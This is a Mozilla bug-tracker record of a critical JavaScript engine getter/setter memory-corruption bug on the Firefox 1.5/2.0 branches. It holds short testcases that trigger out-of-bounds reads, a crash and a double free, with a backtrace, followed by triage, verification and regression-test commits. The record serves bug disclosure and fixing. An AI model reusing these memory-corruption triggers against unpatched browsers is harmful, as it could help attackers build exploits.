Closed Bug 367501 Opened 18 years ago Closed 18 years ago

getter/setter issue is not yet fixed on branches

Core :: JavaScript Engine, defect
Platform: x86, Windows XP; Severity: normal; Priority: Not set

Status: VERIFIED FIXED

Reporter: moz_bug_r_a4; Assignee: Unassigned

Keywords: verified1.8.0.10, verified1.8.1.2; Whiteboard: [sg:critical] fix in bug 366292

Attachments: 5 files
Attached file testcase
The patch in bug 366396 is not sufficient to fix this on branches.
CACHED_GET, CACHED_SET, NATIVE_GET, NATIVE_SET are related.

And, this could be potentially exploitable.

---
var a = { set x() {} };
a.x;

The resulting value is 2 (obj->slots[-1] == 5).

---
var a = { set x() {} };
for (var i = 0; i < 92169 - 3; ++i) a[i] = 1;
a.x;
a.x;

The resulting value is 46084 (obj->slots[-1] == 92169).

---
var a = { set x() {} };
for (var i = 0; i < 0x4bf20 - 3; ++i) a[i] = 1;
a.x;
a.x.x;

Crash (obj->slots[-1] == 0x4bf20).

---
var a = { set x() {} };
for (var i = 0; i < 0x10050c - 3; ++i) a[i] = 1;
a.x;
typeof a.x;

The resulting value is "string" (obj->slots[-1] == 0x10050c).

---
var a = { get y() {} };
a.y = 10;
for (var i = 0; i < 3; ++i) a[i] = 1;

*** glibc detected *** double free or corruption (out): 0x08a42d90 ***

#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb74d19a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb74d32b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb750587a in __fsetlocking () from /lib/tls/i686/cmov/libc.so.6
#4  0xb750bfd4 in malloc_usable_size () from /lib/tls/i686/cmov/libc.so.6
#5  0xb750c34a in free () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7e6fe75 in JS_free (cx=0x885a1f0, p=0x8a42d90) at jsapi.c:1690
#7  0xb7ee9436 in AllocSlots (cx=0x885a1f0, slots=0x8a42d94, nslots=8)
    at jsobj.c:2280
#8  0xb7eeb140 in js_AllocSlot (cx=0x885a1f0, obj=0x8a80b30, slotp=0xbfa80e04)
    at jsobj.c:2733
#9  0xb7f26a7c in js_AddScopeProperty (cx=0x885a1f0, scope=0x8a29d38, id=5,
    getter=0, setter=0, slot=4294967295, attrs=1, flags=0, shortid=0)
    at jsscope.c:1134
#10 0xb7eee70a in js_SetProperty (cx=0x885a1f0, obj=0x8a80b30, id=5,
    vp=0xbfa815f0) at jsobj.c:3699
#11 0xb7eca7e2 in js_Interpret (cx=0x885a1f0, pc=0x88017ad "8\002)",
    result=0xbfa81990) at jsinterp.c:3737
#12 0xb7eb94f5 in js_Execute (cx=0x885a1f0, chain=0x8a80b48, script=0x8801740,
    down=0x81baff8, flags=32, result=0xbfa81b70) at jsinterp.c:1654
#13 0xb7ee5e07 in obj_eval (cx=0x885a1f0, obj=0x8a94418, argc=1,
    argv=0x81bb078, rval=0xbfa81b70) at jsobj.c:1360
#14 0xb7eb8927 in js_Invoke (cx=0x885a1f0, argc=1, flags=0) at jsinterp.c:1396
SeaMonkey 1.1 has been released with this bug.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070111 SeaMonkey/1.1
Bug 366292 was never checked into the 1.8 branch...
Is this a duplicate of bug 366292 then, or is that just a prerequisite to fixing this?
(In reply to comment #1)
> SeaMonkey 1.1 has been released with this bug.

The SeaMonkey team decided to release the much delayed 1.1 now rather than wait for 1.8.1.2 and plan to catch up with a subsequent security update.
Flags: blocking1.8.1.2?
Flags: blocking1.8.1.2?
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] fix in bug 366292
brendan:  Is this a dup of bug 366292?  If so, we need to mark it so and remove the blocking flags (since we already approved and landed the fixes in that other bug).  Let us know... thanks!
Depends on: 366292
This has been fixed in bug 366292.

Tested with:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070122
BonEcho/2.0.0.2pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070122
Firefox/1.5.0.10pre
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.8.0.10, 1.8.1.2 2007-02-08 windows/mac*/linux
verified fixed 2007-02-17 1.9.0 windows/mac*/linux
Status: RESOLVED → VERIFIED
Group: security
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-01.js,v  <--  regress-367501-01.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-02.js,v  <--  regress-367501-02.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-03.js,v  <--  regress-367501-03.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-04.js,v  <--  regress-367501-04.js
initial revision: 1.1